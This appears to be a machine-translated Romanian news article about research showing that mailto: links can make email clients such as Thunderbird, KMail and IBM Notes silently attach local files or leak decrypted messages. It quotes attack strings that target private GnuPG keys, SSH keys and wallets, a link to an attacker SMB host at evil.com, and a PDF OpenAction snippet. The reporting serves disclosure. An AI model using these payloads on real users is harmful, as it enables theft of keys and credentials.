Cercetători de la Universitatea Ruhr Bochum (Germania) () comportamentul clienților de mail la procesarea link-urilor „mailto:” cu parametri avansați. Cinci dintre cei douăzeci de clienți de e-mail examinați au fost vulnerabili la un atac care a manipulat înlocuirea resurselor folosind parametrul „atașare”. Alți șase clienți de e-mail au fost vulnerabili la un atac de înlocuire a cheilor PGP și S/MIME, iar trei clienți au fost vulnerabili la un atac pentru a extrage conținutul mesajelor criptate.
Link-uri «„sunt folosite pentru a automatiza deschiderea unui client de e-mail în scopul de a scrie o scrisoare către destinatarul specificat în link. Pe lângă adresă, puteți specifica parametri suplimentari ca parte a linkului, cum ar fi subiectul scrisorii și un șablon pentru conținut tipic. Atacul propus manipulează parametrul „atașați”, care vă permite să atașați un atașament la mesajul generat.
Clienții de corespondență Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) și Pegasus Mail au fost vulnerabili la un atac banal care vă permite să atașați automat orice fișier local, specificat printr-un link precum „mailto:?attach=path_to_file”. Fișierul este atașat fără afișarea unui avertisment, așa că, fără o atenție specială, este posibil ca utilizatorul să nu observe că scrisoarea va fi trimisă cu atașament.
De exemplu, folosind un link precum „mailto:[e-mail protejat]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" puteți introduce chei private din GnuPG în scrisoare. De asemenea, puteți trimite conținutul portofelelor cripto (~/.bitcoin/wallet.dat), cheilor SSH (~/.ssh/id_rsa) și orice fișiere accesibile utilizatorului. În plus, Thunderbird vă permite să atașați grupuri de fișiere prin mască folosind constructe precum „attach=/tmp/*.txt”.
Pe lângă fișierele locale, unii clienți de e-mail procesează link-uri către stocarea în rețea și căile pe serverul IMAP. În special, IBM Notes vă permite să transferați un fișier dintr-un director de rețea atunci când procesați legături precum „attach=\\evil.com\dummyfile”, precum și să interceptați parametrii de autentificare NTLM prin trimiterea unei legături către un server SMB controlat de atacator (cererea va fi trimisă cu utilizatorul actual al parametrilor de autentificare).
Thunderbird procesează cu succes cereri precum „attach=imap:///fetch>UID>/INBOX>1/”, care vă permit să atașați conținut din folderele de pe serverul IMAP. În același timp, mesajele preluate de pe IMAP, criptate prin OpenPGP și S/MIME, sunt decriptate automat de clientul de e-mail înainte de a fi trimise. Dezvoltatorii Thunderbird au fost despre problema din februarie și în ediție problema a fost deja rezolvată (ramurile Thunderbird 52, 60 și 68 rămân vulnerabile).
Versiunile vechi de Thunderbird au fost, de asemenea, vulnerabile la alte două variante de atac pe PGP și S/MIME propuse de cercetători. În special, Thunderbird, precum și OutLook, PostBox, eM Client, MailMate și R2Mail2, au fost supuse unui atac de înlocuire a cheilor, cauzat de faptul că clientul de mail importă și instalează automat certificate noi transmise în mesajele S/MIME, ceea ce permite atacatorul să organizeze înlocuirea cheilor publice deja stocate de utilizator.
Al doilea atac, la care sunt susceptibile Thunderbird, PostBox și MailMate, manipulează caracteristicile mecanismului de salvare automată a mesajelor nefinalizate și permite, folosind parametrii mailto, să inițieze decriptarea mesajelor criptate sau adăugarea unei semnături digitale pentru mesaje arbitrare, cu transmiterea ulterioară a rezultatului către serverul IMAP al atacatorului. În acest atac, textul cifrat este transmis prin parametrul „corp”, iar eticheta „meta refresh” este folosită pentru a iniția un apel către serverul IMAP al atacatorului. De exemplu: ' '
Pentru a procesa automat link-urile „mailto:” fără interacțiunea utilizatorului, pot fi utilizate documente PDF special concepute - acțiunea OpenAction în PDF vă permite să lansați automat gestionarea mailto atunci când deschideți un document:
%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 0 obj
<< /Type /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
endobj
Sursa: opennet.ru